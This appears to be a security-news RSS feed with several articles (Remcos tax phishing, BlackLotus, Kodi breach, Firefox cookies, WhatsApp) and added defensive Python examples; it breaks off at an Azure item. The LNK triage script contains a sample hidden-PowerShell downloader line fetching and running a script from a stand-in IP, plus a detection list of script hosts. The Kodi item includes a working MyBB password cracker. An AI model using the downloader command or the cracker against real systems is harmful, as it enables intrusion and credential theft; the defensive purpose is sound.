	Benjamin Franklin once wrote, "The only two certainties in life are death and taxes". With the annual US Tax Day approaching on Tuesday, April 18, we might include a third certainty to that list: internet scams. This week, Microsoft's security division put out an alert on a new phishing scam that's targeting accounting and tax return firms ahead of Tax Day.
</p>

<p>
	 
</p>

<p>
	Microsoft's blog post says that the company noticed the new scams in February. They are being sent out by hackers who hope to deliver the Remcos remote access trojan to a PC. Remcos is a remote access trojan that gives the attacker remote control of an infected Windows PC. Microsoft says:
</p>

<p>
	 
</p>

<p style="margin-left:40px;">
	<em>While social engineering lures like this one are common around Tax Day and other big topic current events, these campaigns are specific and targeted in a way that is uncommon. The targets for this threat are exclusively organizations that deal with tax preparation, financial services, CPA and accounting firms, and professional service firms dealing in bookkeeping and tax.</em>
</p>

<p style="margin-left:40px;">
	 
</p>

<p style="margin-left:40px;text-align:center;">
	<img alt="1681474394_remcos-malware-phishing-lure-" class="ipsImage" data-ratio="59.31" height="405" width="720" src="https://cdn.neowin.com/news/images/uploaded/2023/04/1681474394_remcos-malware-phishing-lure-n_story.jpg" />
</p>

<p style="margin-left:40px;">
	 
</p>

<p>
	Naturally, these types of firms get very busy this time of year ahead of Tax Day with clients emailing them information about their taxes and financial information. Microsoft says that this phishing campaign has sent out emails that look like they come from a client of an accounting or tax firm. They contain a link to a real file-sharing service, with a real Amazon Web Services click-tracking link.
</p>

<p>
	 
</p>

<p>
	Unfortunately for the person who clicks on that link, they will then be taken to the file-sharing site, where the hacker has placed Windows shortcut (.LNK) files. Microsoft says:
</p>

<p>
	 
</p>

<p style="margin-left:40px;">
	<em>These LNK files generate web requests to actor-controlled domains and/or IP addresses to download malicious files. These malicious files then perform actions on the target device and download the Remcos payload, providing the actor potential access to the target device and network.</em>
</p>
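<p>
	The description above is enough to triage shortcut files mechanically. The following Python is an added example, not Microsoft's tooling: it parses the parts of the MS-SHLLINK format needed for triage (the LinkFlags and the StringData section that holds the target path and command-line arguments) and flags shortcuts whose target is a script host or whose arguments contain a URL, an IP address, or a hidden/encoded PowerShell switch. The two shortcuts it examines are constructed in memory; the path, hostname and TEST-NET IP address are made up.
</p>

```python
"""Minimal Windows Shell Link (.LNK) parser and triage heuristic.

Added example (not Microsoft's or the original article's code). It builds a
few constructed .lnk files in memory, parses the parts of the MS-SHLLINK
format needed for triage (LinkFlags and the StringData section), and flags
shortcuts whose target or arguments look like a downloader. The sample
paths, hostname and IP (203.0.113.10, a TEST-NET address) are made up.
"""
import re
import struct

# MS-SHLLINK ShellLinkHeader constants
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

STRING_FIELDS = [  # StringData order is fixed by the spec
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]


def build_lnk(relative_path, arguments="", working_dir=""):
    """Construct a minimal, spec-shaped .lnk (header + Unicode StringData only)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    if working_dir:
        flags |= HAS_WORKING_DIR
    if arguments:
        flags |= HAS_ARGUMENTS
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        HEADER_SIZE, LINK_CLSID, flags,
        0,           # FileAttributes
        0, 0, 0,     # CreationTime, AccessTime, WriteTime
        0,           # FileSize
        0,           # IconIndex
        1,           # ShowCommand = SW_SHOWNORMAL
        0, 0, 0, 0,  # HotKey, Reserved1, Reserved2, Reserved3
    )
    values = {"relative_path": relative_path, "working_dir": working_dir,
              "arguments": arguments}
    body = b""
    for flag, name in STRING_FIELDS:
        if flags & flag:  # CountCharacters (u16) followed by UTF-16LE chars
            body += struct.pack("<H", len(values[name])) + values[name].encode("utf-16-le")
    return header + body


def parse_lnk(data):
    """Return (LinkFlags, StringData fields) of a .lnk blob; IDList/LinkInfo are skipped."""
    if len(data) < HEADER_SIZE or data[:4] != struct.pack("<I", HEADER_SIZE) \
            or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    offset = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) + items
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) covers the whole block
        offset += struct.unpack_from("<I", data, offset)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, offset)[0]
        offset += 2
        raw = data[offset: offset + count * (2 if unicode else 1)]
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
        offset += len(raw)
    return flags, fields


INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "bitsadmin", "curl")
URL_OR_IP = re.compile(r"https?://|\b(?:\d{1,3}\.){3}\d{1,3}\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b", re.I)


def triage_lnk(data):
    """Sorted reason codes for a shortcut worth a closer look ([] if nothing stands out)."""
    _, fields = parse_lnk(data)
    target = fields.get("relative_path", "").lower()
    args = fields.get("arguments", "")
    reasons = set()
    for name in INTERPRETERS:
        if name in target:
            reasons.add("interpreter:" + name.split(".")[0])
    if URL_OR_IP.search(args) or URL_OR_IP.search(target):
        reasons.add("remote-fetch")
    if HIDDEN.search(args):
        reasons.add("hidden-or-encoded")
    return sorted(reasons)


# Constructed samples: an ordinary application shortcut and a tax-lure style downloader.
SAMPLES = {
    "benign": build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe",
                        working_dir=r"C:\Program Files\Notepad++"),
    "tax_lure": build_lnk(
        r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r'-w hidden -c "iwr http://203.0.113.10/tax.vbs -o $env:TEMP\t.vbs; wscript $env:TEMP\t.vbs"'),
}

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        print(f"{label:<9} {triage_lnk(blob) or 'clean'}")
```

<p>
	The heuristics are deliberately blunt (a shortcut that launches PowerShell with a URL in its arguments is rare in a legitimate download folder) and will miss shortcuts that store their target only in the IDList, which this parser skips rather than decodes. Feed real .lnk files to parse_lnk() and triage_lnk() after copying them out of the file-sharing download, not by double-clicking them.
</p>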

<p>
	 
</p>

<p>
	The good news for Windows PC users who work in those financial firms is that Microsoft 365 Defender and Microsoft Defender Antivirus can detect these malicious files and prevent the remote takeover of their PCs. Obviously, those users should always be suspicious of any emails that have links to file-sharing sites, especially from clients that they don't know.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.neowin.net/news/microsoft-warns-accounting-and-tax-return-firms-of-a-new-phishing-attack-ahead-of-us-tax-day/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">14518</guid><pubDate>Fri, 14 Apr 2023 16:18:41 +0000</pubDate></item><item><title>WhatsApp will soon add three new security features</title><link>https://nsaneforums.com/news/security-privacy-news/whatsapp-will-soon-add-three-new-security-features-r14513/</link><description><![CDATA[<p>
	Meta <a href="https://blog.whatsapp.com/new-security-features-account-protect-device-verification-automatic-security-codes" rel="external nofollow">has announced</a> that it will be adding three new security features to WhatsApp in the coming months. The new features include <strong>Account Protect</strong>, <strong>Device Verification</strong>, and <strong>Automatic Security Codes</strong>. These features will accompany already existing security features such as two-step verification, end-to-end encrypted backups, and encrypted messaging.
</p>

<p>
	 
</p>

<p>
	With <strong>Account Protect</strong>, WhatsApp will now ask you to verify on your old device that you’re trying to use the app on a new device. Meta didn’t explain what happens if you’ve lost your old device, but presumably, this won’t prevent you from setting up on a new device. The new security check is just designed to provide a bit more security.
</p>

<p>
	 
</p>

<p>
	With <strong>Device Verification</strong>, Meta runs checks in the background to verify it’s really you sending messages. The company said the chief reason for adding this feature was to protect against unofficial WhatsApp clients. It said fake WhatsApp clients can steal your authentication keys to send spam. With Device Verification, users get more security without having to do anything.
</p>

<p>
	 
</p>

<p>
	The last new addition is <strong>Automatic Security Codes</strong>. This feature uses something called Key Transparency, which automatically checks that you have a secure connection with the person you’re chatting to. You'll be able to navigate to the encryption tab in WhatsApp in the coming months to see if chats are secure.
</p>
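<p>
	As an added illustration of the idea behind Automatic Security Codes (not Meta's design or code; WhatsApp's real directory is a more elaborate auditable data structure), the Python below publishes (user, public key) entries in a Merkle tree and has the client verify an inclusion proof against the published root before trusting a contact's key. The users and 32-byte stand-in keys are constructed.
</p>

```python
"""Toy key-transparency check behind an 'automatic security code'.

Added example to illustrate the idea, not Meta's design or code: WhatsApp's
real directory is a more elaborate auditable data structure. Here the
server publishes (user, public key) entries in a Merkle tree; a client that
knows the current root hash accepts a contact's key only with a valid
inclusion proof, so a substituted key is caught without the user comparing
security codes by hand. Users and keys below are constructed.
"""
import hashlib


def _sha256(data):
    return hashlib.sha256(data).digest()


def leaf_hash(user, key):
    # Domain-separate leaves from interior nodes (blocks second-preimage games).
    return _sha256(b"\x00" + user.encode() + b"\x00" + key)


def node_hash(left, right):
    return _sha256(b"\x01" + left + right)


def build_tree(leaves):
    """Levels bottom-up; a level with an odd count is padded by repeating its last node."""
    levels = [list(leaves)]
    while len(levels[-1]) > 1:
        cur = levels[-1]
        if len(cur) % 2:
            cur.append(cur[-1])
        levels.append([node_hash(cur[i], cur[i + 1]) for i in range(0, len(cur), 2)])
    return levels


def inclusion_proof(levels, index):
    """Sibling hashes from leaf to root, each tagged with the side it sits on."""
    proof = []
    for level in levels[:-1]:
        sibling = index ^ 1
        proof.append(("R" if sibling > index else "L", level[sibling]))
        index //= 2
    return proof


def verify_inclusion(root, user, key, proof):
    """Client side: recompute the path and compare with the published root."""
    h = leaf_hash(user, key)
    for side, sibling in proof:
        h = node_hash(h, sibling) if side == "R" else node_hash(sibling, h)
    return h == root


class KeyDirectory:
    """Server side: a sorted key log and the Merkle root that commits to it."""

    def __init__(self, entries):
        self.users = sorted(entries)
        self.keys = dict(entries)
        self.levels = build_tree([leaf_hash(u, self.keys[u]) for u in self.users])

    def root(self):
        return self.levels[-1][0]

    def lookup(self, user):
        """What a client is sent: the key and its proof against the current root."""
        return self.keys[user], inclusion_proof(self.levels, self.users.index(user))


# Constructed directory: five users with 32-byte stand-in public keys.
SAMPLE_KEYS = {name: _sha256(b"fake-key:" + name.encode())
               for name in ["alice", "bob", "carol", "dave", "erin"]}

if __name__ == "__main__":
    directory = KeyDirectory(SAMPLE_KEYS)
    published_root = directory.root()        # what clients learn out of band
    key, proof = directory.lookup("bob")
    print("bob's real key verifies:   ", verify_inclusion(published_root, "bob", key, proof))
    mitm_key = _sha256(b"attacker")          # a key substituted in transit
    print("substituted key verifies:  ", verify_inclusion(published_root, "bob", mitm_key, proof))
```

<p>
	Inclusion alone only proves the key is in the log the root commits to; a deployable scheme also needs consistency proofs between successive roots and some way for clients or auditors to compare roots, so the server cannot show one directory to Alice and another to Bob.
</p>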

<p>
	 
</p>

<p>
	There’s nothing end users need to do to get these new features, just wait patiently as Meta rolls them out in the coming months.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/whatsapp-will-soon-add-three-new-security-features/" rel="external nofollow">WhatsApp will soon add three new security features</a>
</p>
]]></description><guid isPermaLink="false">14513</guid><pubDate>Fri, 14 Apr 2023 04:11:26 +0000</pubDate></item><item><title>Microsoft posts guide for Windows Secure Boot, Defender, VBS, BitLocker-bypassing BlackLotus</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-posts-guide-for-windows-secure-boot-defender-vbs-bitlocker-bypassing-blacklotus-r14473/</link><description><![CDATA[<p>
	Last month, WeLiveSecurity, the security research wing of ESET anti-malware solutions, released its report on the <a href="https://www.neowin.net/news/blacklotus-bypasses-secure-boot-microsoft-defender-vbs-bitlocker-on-updated-windows-11/" rel="external nofollow">BlackLotus UEFI bootkit</a>.
</p>

<p>
	 
</p>

<p>
	If you aren't aware, BlackLotus is a UEFI bootkit, and what makes this malware particularly dangerous is its ability to bypass Secure Boot systems even on updated Windows 11 systems. Besides that, BlackLotus also makes modifications to the registry to disable Hypervisor-protected Code Integrity (HVCI), which is a Virtualization-based Security (VBS) feature; as well as BitLocker encryption. It also disables Windows Defender by manipulating the Early Launch Anti-Malware (ELAM) driver and Windows Defender file system filter driver. The ultimate purpose is to deploy an HTTP downloader which delivers the malicious payloads.
</p>

<p>
	 
</p>

<p>
	Although the security vulnerability dubbed "Baton Drop" (CVE-2022-21894) was patched in January 2022, it is still exploitable because the vulnerable signed binaries have not yet been added to the UEFI revocation list. In recently published guidance, Microsoft has summarized the malicious activities BlackLotus carries out after it has infected a device:
</p>

<p>
	 
</p>

<p>
	The malware uses CVE-2022-21894 (also known as Baton Drop) to bypass Windows Secure Boot and subsequently deploy malicious files to the EFI System Partition (ESP) that are launched by the UEFI firmware. This allows the bootkit to:
</p>

<p>
	 
</p>

<ol>
	<li>
		Achieve persistence by enrolling the threat actor’s Machine Owner Key (MOK)
	</li>
	<li>
		Turn off HVCI to allow deployment of a malicious kernel driver
	</li>
	<li>
		Leverage the kernel driver to deploy the user-mode HTTP downloader for command and control (C2)
	</li>
	<li>
		Turn off Bitlocker to avoid tamper protection strategies on Windows
	</li>
	<li>
		Turn off Microsoft Defender Antivirus to avoid further detection
	</li>
</ol>

<p>
	 
</p>

<p>
	In its guidance, the tech giant has covered, in detail, the techniques to determine if the devices in an organization are infected, as well as recovery and prevention strategies. You can read it on Microsoft's <a href="https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/" rel="external nofollow">official website</a>.
</p>
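<p>
	Microsoft's guidance is the authoritative checklist; the Python below is an added example of one generic check that follows from the bootkit's behaviour (dropping its own files on the ESP), not Microsoft's tooling. It hashes every file on a mounted ESP, diffs the result against a baseline captured from a clean machine, and flags new, changed, recently written or oddly placed files. The expected directory layout and the baseline format are this example's own conventions, and the demo run uses a constructed temporary directory rather than a real ESP; on Windows the ESP is mounted from an elevated prompt with mountvol X: /S and that drive letter is passed as the argument.
</p>

```python
"""Inventory the EFI System Partition and diff it against a known-good baseline.

Added example, not Microsoft's guidance tooling. BlackLotus persists by
dropping its own files on the ESP, so a first on-host check is: which files
are there, when did they change, and do their hashes match what you expect?
On Windows the ESP is mounted with `mountvol X: /S` from an elevated prompt;
on Linux it is usually /boot/efi. The expected directories and the baseline
format are this example's own conventions, and the demo uses a constructed
temporary directory rather than a real ESP.
"""
import hashlib
import os
import sys
import tempfile
import time
from pathlib import Path

# Directories a stock Windows ESP is expected to populate (assumption for the demo).
EXPECTED_DIRS = ("EFI/Microsoft/Boot", "EFI/Boot")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def inventory(esp_root):
    """Relative path -> (sha256, size, mtime) for every file on the ESP."""
    esp_root = Path(esp_root)
    result = {}
    for p in esp_root.rglob("*"):
        if p.is_file():
            st = p.stat()
            result[p.relative_to(esp_root).as_posix()] = (sha256_file(p), st.st_size, st.st_mtime)
    return result


def findings(inv, baseline, recent_days=30, now=None):
    """Flag files that are new, changed, outside expected dirs, recently written, or missing."""
    now = time.time() if now is None else now
    out = []
    for rel, (digest, size, mtime) in sorted(inv.items()):
        if rel not in baseline:
            out.append(("NEW", rel))
        elif baseline[rel] != digest:
            out.append(("CHANGED", rel))
        # FAT is case-insensitive, so compare directory prefixes case-insensitively.
        if not any(rel.lower().startswith(d.lower() + "/") for d in EXPECTED_DIRS):
            out.append(("UNEXPECTED_DIR", rel))
        if now - mtime < recent_days * 86400:
            out.append(("RECENT", rel))
    for rel in sorted(set(baseline) - set(inv)):
        out.append(("MISSING", rel))
    return out


def build_demo_esp(root):
    """Constructed ESP: two stock files dated a year ago plus two files dropped today."""
    year_ago = time.time() - 365 * 86400
    files = {
        "EFI/Microsoft/Boot/bootmgfw.efi": (b"stock boot manager", year_ago),
        "EFI/Boot/bootx64.efi": (b"stock fallback loader", year_ago),
        "EFI/Microsoft/Boot/grubx64.efi": (b"dropped loader in a stock directory", None),
        "EFI/Tools/loader.efi": (b"dropped payload in a non-standard directory", None),
    }
    for rel, (content, mtime) in files.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(content)
        if mtime is not None:
            os.utime(p, (mtime, mtime))
    # Baseline as it would have been captured from a clean machine: the two stock files.
    return {rel: hashlib.sha256(files[rel][0]).hexdigest() for rel in list(files)[:2]}


def demo_findings():
    """Run the whole check against the constructed ESP and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        baseline = build_demo_esp(tmp)
        return findings(inventory(tmp), baseline)


if __name__ == "__main__":
    if len(sys.argv) > 1:  # real use: print an inventory of a mounted ESP to keep as a baseline
        for rel, (digest, size, mtime) in sorted(inventory(sys.argv[1]).items()):
            stamp = time.strftime("%Y-%m-%d", time.localtime(mtime))
            print(f"{digest}  {size:>9}  {stamp}  {rel}")
    else:
        for kind, rel in demo_findings():
            print(f"{kind:<15} {rel}")
```

<p>
	A hit from this check is a lead, not a verdict: a legitimate firmware or OS update also writes to the ESP, so confirm the flagged files' signatures and compare against the indicators in Microsoft's guidance before calling it an infection.
</p>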

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/microsoft-posts-guide-for-windows-secure-boot-defender-vbs-bitlocker-bypassing-blacklotus/" rel="external nofollow">Microsoft posts guide for Windows Secure Boot, Defender, VBS, BitLocker-bypassing BlackLotus</a>
</p>
]]></description><guid isPermaLink="false">14473</guid><pubDate>Thu, 13 Apr 2023 08:03:24 +0000</pubDate></item><item><title>All Firefox users are now protected better against online tracking</title><link>https://nsaneforums.com/news/security-privacy-news/all-firefox-users-are-now-protected-better-against-online-tracking-r14472/</link><description><![CDATA[<p>
	Mozilla <a data-wpel-link="external" href="https://blog.mozilla.org/en/mozilla/firefox-rolls-out-total-cookie-protection-by-default-to-all-users-worldwide/" rel="external nofollow" target="_blank">announced</a> today that it is rolling out Total Cookie Protection to users worldwide and turning it on by default.
</p>

<p>
	 
</p>

<p>
	Total Cookie Protection can best be described as a sandbox for cookies. To better understand what it does, it is necessary to understand how cookies work without it.
</p>

<p>
	 
</p>

<p>
	When a user visits a website, the site, and any other site that has elements on the opened page, may place cookies and other data on the user's device. Some companies use these cookies to track users across websites and pages. The wider their reach is, the better their ability to track users.
</p>

<p>
	 
</p>

<p>
	Browsers have included options to deal with cookies for a long time. Most allow users to block third-party cookies outright or delete cookies regularly. There are also extensions that help with cookies, such as <a data-wpel-link="internal" href="https://www.ghacks.net/2020/08/21/cookie-autodelete-3-5-0-extension-gets-massive-cleanup-improvements/" rel="external nofollow">Cookie AutoDelete</a>.
</p>

<h2>
	Total Cookie Protection in Firefox
</h2>

<p>
	<img alt="total-cookie-protection-on-by-default.pn" class="ipsImage" data-ratio="75.10" height="413" width="720" src="https://www.ghacks.net/wp-content/uploads/2023/04/total-cookie-protection-on-by-default.png">
</p>

<p>
	 
</p>

<p>
	Total Cookie Protection in Firefox limits cookies to the websites they were created on. These cookies can't be accessed from other websites, which makes them useless for cross-site tracking. In other words: cookies now have only limited use in Firefox when it comes to tracking.
</p>
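<p>
	To make the partitioning concrete, here is an added Python model (not Mozilla's code) of a cookie jar keyed the classic way and keyed by (top-level site, cookie site) as Total Cookie Protection does. A tracker embedded on two unrelated sites reads back the same identifier from the classic jar and two unrelated identifiers from the partitioned one. Site names are made up and the registrable-domain logic is simplified (no Public Suffix List).
</p>

```python
"""Cookie jar with and without state partitioning.

Added example, not Mozilla's code: a minimal model of what Total Cookie
Protection changes. A classic jar keys cookies by the site that set them,
so a tracker embedded on two different sites reads back the same
identifier. A partitioned jar keys them by (top-level site, setting site),
so the tracker sees a different, unrelated cookie jar on each site it is
embedded in. Site names are made up; site_of() is simplified and ignores
the Public Suffix List.
"""
import secrets
from urllib.parse import urlsplit


def site_of(url):
    """Registrable domain, simplified: the last two host labels."""
    host = urlsplit(url).hostname or ""
    return ".".join(host.split(".")[-2:])


class CookieJar:
    def __init__(self, partitioned):
        self.partitioned = partitioned
        self.store = {}  # jar key -> {cookie name: value}

    def _key(self, top_level_url, request_url):
        site = site_of(request_url)
        # Partitioned: the top-level site is part of the key, so the same
        # third party gets a separate jar under every site that embeds it.
        return (site_of(top_level_url), site) if self.partitioned else (site,)

    def set_cookie(self, top_level_url, request_url, name, value):
        self.store.setdefault(self._key(top_level_url, request_url), {})[name] = value

    def get_cookie(self, top_level_url, request_url, name):
        return self.store.get(self._key(top_level_url, request_url), {}).get(name)


def tracker_visit(jar, top_level_url, tracker_url="https://ads.tracker.example/pixel"):
    """The embedded third party: reuse its id cookie if present, else mint one."""
    uid = jar.get_cookie(top_level_url, tracker_url, "uid")
    if uid is None:
        uid = secrets.token_hex(8)
        jar.set_cookie(top_level_url, tracker_url, "uid", uid)
    return uid


def ids_seen_by_tracker(partitioned, sites=("https://news.example/", "https://shop.example/")):
    """The tracker's id per top-level site over one browsing session."""
    jar = CookieJar(partitioned)
    return {site_of(s): tracker_visit(jar, s) for s in sites}


if __name__ == "__main__":
    for mode, seen in (("classic", ids_seen_by_tracker(False)),
                       ("partitioned", ids_seen_by_tracker(True))):
        linkable = len(set(seen.values())) == 1
        print(f"{mode:<12} {seen}  cross-site linkable: {linkable}")
```

<p>
	First-party use is unaffected: a cookie news.example sets on its own pages is still readable when the top-level site is news.example (including its subdomains), and only the cross-site case is separated.
</p>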

<p>
	 
</p>

<p>
	Firefox users had to enable the Total Cookie Protection feature manually up until now, using the Custom Enhanced Tracking Protection settings.
</p>

<p>
	 
</p>

<p>
	Mozilla is rolling out a change that adds Total Cookie Protection to Firefox's standard Tracking Protection mode. Enhanced Tracking Protection improves protection against online tracking through a variety of defensive tools.
</p>

<p>
	 
</p>

<p>
	The standard protection is the default, and it blocks social media trackers, cryptominers and fingerprinting scripts. Now, it also isolates third-party cookies to the site they were set on by default, which neutralizes their use for cross-site tracking.
</p>

<p>
	 
</p>

<p>
	Note that the option is also enabled in Strict mode, and that users may configure it to be enabled in Custom mode as well.
</p>

<h3>
	Closing Words
</h3>

<p>
	The change improves tracking protection in Firefox significantly. Previously, Firefox users had to enable the Total Cookie Protection feature manually in the browser to improve protection against cookie-based tracking.
</p>

<p>
	 
</p>

<p>
	Mozilla began <a data-wpel-link="internal" href="https://www.ghacks.net/2022/05/27/mozilla-is-rolling-out-total-cookie-protection-to-more-firefox-users/" rel="external nofollow">prompting desktop users</a> about the feature in May 2022 and <a data-wpel-link="internal" href="https://www.ghacks.net/2022/11/14/total-cookie-protection-is-now-available-in-firefox-for-android/" rel="external nofollow">launched it in Firefox for Android</a> in November of the same year. Firefox was already blocking a list of known tracking cookies at that point.
</p>

<p>
	 
</p>

<p>
	Now that Total Cookie Protection is on by default in Firefox, Firefox users are better protected when it comes to cookie-based tracking. It is a good step in the right direction.
</p>

<p>
	 
</p>

<p>
	Those who want even more protection may want to check out <a data-wpel-link="internal" href="https://www.ghacks.net/2023/04/03/mullvad-browser-privacy-friendly-browser-launched/" rel="external nofollow">Mullvad Browser</a>, which is based on Tor Browser, itself a modified Firefox ESR build.
</p>

<p>
	 
</p>

<p>
	<strong>Now You: </strong>How do you handle cookies in your browsers?
</p>

<p>
	 
</p>


<p>
	 
</p>

<p>
	<a href="https://www.ghacks.net/2023/04/13/all-firefox-users-are-now-protected-better-against-online-tracking/" rel="external nofollow">All Firefox users are now protected better against online tracking</a>
</p>
]]></description><guid isPermaLink="false">14472</guid><pubDate>Thu, 13 Apr 2023 08:02:04 +0000</pubDate></item><item><title>Kodi confirms user forum data breach</title><link>https://nsaneforums.com/news/security-privacy-news/kodi-confirms-user-forum-data-breach-r14455/</link><description><![CDATA[<p>
	Kodi, maker of the popular entertainment center app, <a data-wpel-link="external" href="https://kodi.tv/article/important-kodi-forum-data-breach/#98" rel="external nofollow" target="_blank">confirmed</a> a data breach of its user forum software earlier this week. The development team became aware of the hack after a dump of the Kodi user forum was offered for sale on the darknet.
</p>

<p>
	 
</p>

<p>
	Note: the Kodi software itself (the latest release is <a data-wpel-link="internal" href="https://www.ghacks.net/2023/01/16/kodi-20-home-theater-software-has-been-released/" rel="external nofollow">Kodi 20</a>) was not affected by the breach in any way.
</p>

<p>
	 
</p>


<p>
	Initial investigation into the matter revealed that the attacker breached a forum admin account of an inactive, but trusted, member, and managed to access the admin console twice. This happened in mid-February of 2023.
</p>

<p>
	 
</p>

<p>
	The admin account was used to create backups of the databases, which were then downloaded.
</p>

<p>
	 
</p>

<p>
	Kodi disabled the account in question to prevent future access to the systems, once it became aware of the incident. It also "conducted an initial review of team infrastructure the team member had access to", reported the incident to the UK police and notified the UK Information Commissioner's Office.
</p>

<p>
	 
</p>

<p>
	<img alt="kodi-17.webp" class="ipsImage" data-ratio="75.10" height="402" width="720" src="https://www.ghacks.net/wp-content/uploads/2017/02/kodi-17.webp">
</p>

<p>
	 
</p>

<p>
	The downloaded database backups "expose all public forum posts, all team forum posts, all messages sent through the user-to-user messaging system, and user data including forum username, email address used for notifications, and an encrypted (hashed and salted) password generated by the MyBB (v1.8.27) software".
</p>

<p>
	 
</p>

<p>
	Users of the forum should assume that their "Kodi forum credentials and any private data shared with other users through the user-to-user messaging system is compromised".
</p>

<p>
	 
</p>

<p>
	While the passwords are hashed and salted rather than stored in clear text, Kodi considers them compromised and thus burned. Kodi announced the following plans to deal with the breach:
</p>
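<p>
	To see why Kodi is right to treat the passwords as burned, here is an added example (not Kodi's or MyBB's code). MyBB 1.8 stores md5(md5(salt) + md5(password)) with a short random salt; two MD5 calls cost microseconds, so a leaked salt and hash fall to a wordlist almost instantly. The forum row, salt and wordlist below are constructed.
</p>

```python
"""Why a 'hashed and salted' MyBB password dump is still burned.

Added example, not Kodi's or MyBB's code. MyBB 1.8 stores
md5(md5(salt) + md5(password)) with a short random salt (the scheme in the
1.8 series' functions_user.php). Two MD5 rounds cost microseconds, so a
leaked salt+hash pair falls to a wordlist almost instantly. The user, salt
and wordlist below are constructed for the demo.
"""
import hashlib
import time


def mybb_hash(password, salt):
    """MyBB 1.8 password hash: md5(md5(salt) . md5(password)), hex-encoded."""
    inner = hashlib.md5(salt.encode()).hexdigest() + hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5(inner.encode()).hexdigest()


def crack(stored_hash, salt, wordlist):
    """Return the first candidate whose MyBB hash matches, or None."""
    for candidate in wordlist:
        if mybb_hash(candidate, salt) == stored_hash:
            return candidate
    return None


def hashes_per_second(salt, seconds=0.2):
    """Rough single-core throughput of the scheme in pure Python."""
    n, deadline = 0, time.perf_counter() + seconds
    while time.perf_counter() < deadline:
        mybb_hash(f"candidate{n}", salt)
        n += 1
    return int(n / seconds)


# Constructed sample: one row as it would appear in the dumped users table.
SAMPLE_SALT = "qZ7pL2xK"
SAMPLE_PASSWORD = "kodi2023!"
SAMPLE_ROW = {"username": "mediafan", "salt": SAMPLE_SALT,
              "password": mybb_hash(SAMPLE_PASSWORD, SAMPLE_SALT)}
SAMPLE_WORDLIST = ["password", "123456", "kodi", "kodi2023", "kodi2023!", "letmein"]

if __name__ == "__main__":
    hit = crack(SAMPLE_ROW["password"], SAMPLE_ROW["salt"], SAMPLE_WORDLIST)
    print(f"{SAMPLE_ROW['username']}: recovered {hit!r}")
    print(f"~{hashes_per_second(SAMPLE_SALT):,} hashes/s in pure Python; "
          "GPU crackers manage orders of magnitude more")
```

<p>
	The salt defeats precomputed tables and nothing else: each user costs a separate run, but each run is cheap. With bcrypt or Argon2 the same wordlist costs milliseconds per guess instead of microseconds, which is the difference between "burned" and "expensive to attack".
</p>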

<p>
	 
</p>

<ul>
	<li>
		All exposed email data will be shared with <a data-wpel-link="external" href="https://haveibeenpwned.com/" rel="external nofollow" target="_blank">Have I Been Pwned</a>, a site that lets users check whether an email address has been part of a breach.
	</li>
	<li>
		Kodi plans to perform a global password reset. This resets all passwords and prevents further compromise or access to personal data. Kodi forum users need to change passwords at other services, if they re-used the password.
	</li>
	<li>
		The latest version of the forum software is currently being redeployed. Since this requires comparison against the old version, the forum will remain offline for at least a few days. Access to the admin console will be further restricted and hardened.
	</li>
</ul>

<p>
	 
</p>

<p>
	The global password reset will likely happen once the forums go back online. Users will be informed by email about the reset, and they need to set a new password on the first visit to the forum.
</p>

<p>
	 
</p>

<p>
	<strong>Now You: </strong>are you a Kodi user?
</p>

<p>
	 
</p>


<p>
	 
</p>

<p>
	<a href="https://www.ghacks.net/2023/04/12/kodi-confirms-user-forum-data-breach/" rel="external nofollow">Kodi confirms user forum data breach</a>
</p>
]]></description><guid isPermaLink="false">14455</guid><pubDate>Wed, 12 Apr 2023 06:26:10 +0000</pubDate></item><item><title>Newly Discovered "By-Design" Flaw in Microsoft Azure Could Expose Storage Accounts to Hackers</title><link>https://nsaneforums.com/news/security-privacy-news/newly-discovered-by-design-flaw-in-microsoft-azure-could-expose-storage-accounts-to-hackers-r14429/</link><description><![CDATA[<p>
	A "by-design flaw" uncovered in Microsoft Azure could be exploited by attackers to gain access to storage accounts, move laterally in the environment, and even execute remote code.
</p>

<p>
	 
</p>

<p>
